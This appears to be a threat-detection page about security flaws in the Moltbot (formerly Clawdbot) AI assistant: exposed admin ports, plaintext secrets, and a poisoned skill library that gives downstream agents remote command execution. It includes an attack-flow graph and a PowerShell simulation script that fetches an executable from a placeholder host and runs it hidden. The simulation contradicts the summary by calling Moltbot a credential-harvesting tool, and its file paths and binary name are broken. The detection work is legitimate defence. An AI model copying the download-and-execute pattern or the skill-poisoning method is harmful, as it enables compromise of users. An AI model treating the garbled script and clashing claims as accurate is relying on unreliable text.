Follow
Summary
The article flags security issues around the AI personal assistant first branded Clawdbot and later renamed Moltbot. Moltbot is operated through messaging apps like WhatsApp and Telegram, yet many deployments are reachable from the internet with weak or missing authentication. It writes user credentials to plaintext files, and its skill library can be poisoned, creating a supply-chain exposure. Threat actors could steal secrets, exfiltrate source code, and repurpose the assistant as a backdoor.
Investigation
Researchers found hundreds of Moltbot instances exposing unauthenticated admin ports and unsafe proxy configurations. A proof-of-concept supply-chain attack uploaded a malicious skill to the ClawdHub library, demonstrating remote command execution for downstream users. Analysts also observed that secrets are persisted in plain-text Markdown and JSON files, making them easy pickings for commodity infostealers such as RedLine, Lumma, and Vidar.
Mitigation
Operators should require strong authentication for all Moltbot services, close or firewall admin ports, and avoid exposing the assistant to the internet. Enable encryption-at-rest for stored secrets, sandbox or containerize the runtime, and restrict filesystem access. Vet, sign, and pin any skills pulled from the library, and consider disabling the skill feature if it cannot be governed safely.
Response
Alert on open admin ports and unauthenticated access attempts to Moltbot. Monitor the AI process for unexpected command execution and outbound connections to unknown C2 domains. Scan hosts for credential-stealing malware and validate the integrity of stored configuration files. If compromise is confirmed, isolate the system, revoke exposed credentials, and redeploy Moltbot with hardened settings.
“`graph TB %% Class Definitions classDef technique fill:#ffcc99 classDef actor fill:#99ff99 classDef asset fill:#ccccff classDef process fill:#ff9999 %% Nodes actor_attacker[“<b>Actor</b>: Attacker”] class actor_attacker actor asset_moltbot[“<b>Asset</b>: Moltbot instance<br/><b>Exposure</b>: Unauthenticated admin port accessible”] class asset_moltbot asset tech_external_remote[“<b>Technique</b> – T1133: External Remote Services<br/><b>Description</b>: Use publicly exposed remote services to gain initial access”] class tech_external_remote technique tech_exploit_remote[“<b>Technique</b> – T1210: Exploitation of Remote Services<br/><b>Description</b>: Exploit vulnerabilities or misconfigurations in remote services to execute commands”] class tech_exploit_remote technique tech_remote_access[“<b>Technique</b> – T1219: Remote Access Tools<br/><b>Description</b>: Use remote access capabilities to run further commands on compromised host”] class tech_remote_access technique tech_hijack_execution[“<b>Technique</b> – T1574: Hijack Execution Flow<br/><b>Description</b>: Manipulate execution flow by poisoning trusted components such as a skill library”] class tech_hijack_execution technique asset_malicious_skill[“<b>Asset</b>: Malicious Skill<br/><b>Location</b>: ClawHub skill library”] class asset_malicious_skill asset tech_content_injection[“<b>Technique</b> – T1659: Content Injection<br/><b>Description</b>: Inject malicious code into legitimate content that is subsequently executed by victims”] class tech_content_injection technique process_payload[“<b>Process</b>: Malicious Payload<br/><b>Action</b>: Executes on victim Moltbot hosts”] class process_payload process tech_credentials_files[“<b>Technique</b> – T1552.001: Credentials In Files<br/><b>Description</b>: Access plaintext credentials stored in files such as JSON or Markdown”] class tech_credentials_files technique tech_system_services[“<b>Technique</b> – T1569: System Services<br/><b>Description</b>: Register malicious code as a system service for persistence and execution”] class tech_system_services technique asset_c2_server[“<b>Asset</b>: Attacker C2 Server<br/><b>Role</b>: Receives execution confirmations and exfiltrated credentials”] class asset_c2_server asset tech_exfiltration[“<b>Technique</b> – T1041: Exfiltration Over C2 Channel<br/><b>Description</b>: Transfer stolen data to attacker through the established command and control channel”] class tech_exfiltration technique %% Connections actor_attacker –>|discovers| asset_moltbot asset_moltbot –>|allows| tech_external_remote tech_external_remote –>|leads to| tech_exploit_remote tech_exploit_remote –>|uses| tech_remote_access tech_remote_access –>|runs| tech_hijack_execution tech_hijack_execution –>|poisons| asset_malicious_skill asset_malicious_skill –>|injects code into| tech_content_injection tech_content_injection –>|delivers to| process_payload process_payload –>|reads| tech_credentials_files tech_credentials_files –>|provides data for| tech_system_services tech_system_services –>|maintains persistence and executes| process_payload process_payload –>|contacts| asset_c2_server asset_c2_server –>|receives data via| tech_exfiltration“`
Attack Flow
Detections
Possible Moltbot (formerly Clawdbot) Installation Attempt (via proxy)
View
Possible Moltbot (formerly Clawdbot) Installation Attempt (via file_event)
View
Possible Moltbot (formerly Clawdbot) Installation Attempt (via dns)
View
Possible Moltbot (formerly Clawdbot) Installation Attempt (via cmdline)
View
Detection of Moltbot Instances Exposed to the Web [Webserver]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
-
Attack Narrative & Commands:
The red team deploys Moltbot (a publicly‑available credential‑harvesting tool) on a compromised Windows host. By launching Moltbot with its default configuration, it opens an unauthenticated HTTP admin console on port 8080 that advertises “exposed to the web” in its banner. This creates network‑connection events that match the detection rule’s literal strings. The attacker then accesses the UI from an external IP to verify exposure, thereby generating the required telemetry.- Download Moltbot (simulated by a placeholder zip).
- Extract and run the binary with default flags (
--listen 0.0.0.0:8080). - Optionally issue an HTTP GET from an external IP (simulated via
Invoke-WebRequest).
-
Regression Test Script:
# ---------------------------------------------------- # Moltbot Exposure Simulation – PowerShell # ---------------------------------------------------- # 1. Create a temporary directory $tempDir = "$env:TEMPMoltbotSim" New-Item -ItemType Directory -Force -Path $tempDir | Out-Null # 2. Simulate downloading a Moltbot executable (placeholder) $molExe = "$tempDirmolbot.exe" Invoke-WebRequest -Uri "https://example.com/moltbot.exe" -OutFile $molExe -UseBasicParsing # 3. Run Moltbot with default (exposed) settings $proc = Start-Process -FilePath $molExe ` -ArgumentList "--listen 0.0.0.0:8080" ` -PassThru ` -WindowStyle Hidden Write-Host "[+] Moltbot started (PID: $($proc.Id)) listening on 0.0.0.0:8080" # 4. Wait a short period to allow the service to register in logs Start-Sleep -Seconds 5 # 5. Simulate an external connection to generate network traffic Try { Invoke-WebRequest -Uri "http://$($env:COMPUTERNAME):8080" -UseBasicParsing -TimeoutSec 5 Write-Host "[+] External HTTP request sent to Moltbot UI." } Catch { Write-Warning "[-] Unable to reach Moltbot UI (may be blocked by firewall)." } # 6. Keep the process alive for additional logging (optional) Start-Sleep -Seconds 20 # 7. Cleanup – stop Moltbot Stop-Process -Id $proc.Id -Force Remove-Item -Recurse -Force $tempDir Write-Host "[+] Moltbot simulation completed and cleaned up." -
Cleanup Commands:
# Forcefully terminate any leftover Moltbot processes and delete temp files Get-Process -Name "molbot" -ErrorAction SilentlyContinue | Stop-Process -Force Remove-Item -Path "$env:TEMPMoltbotSim" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "Cleanup completed."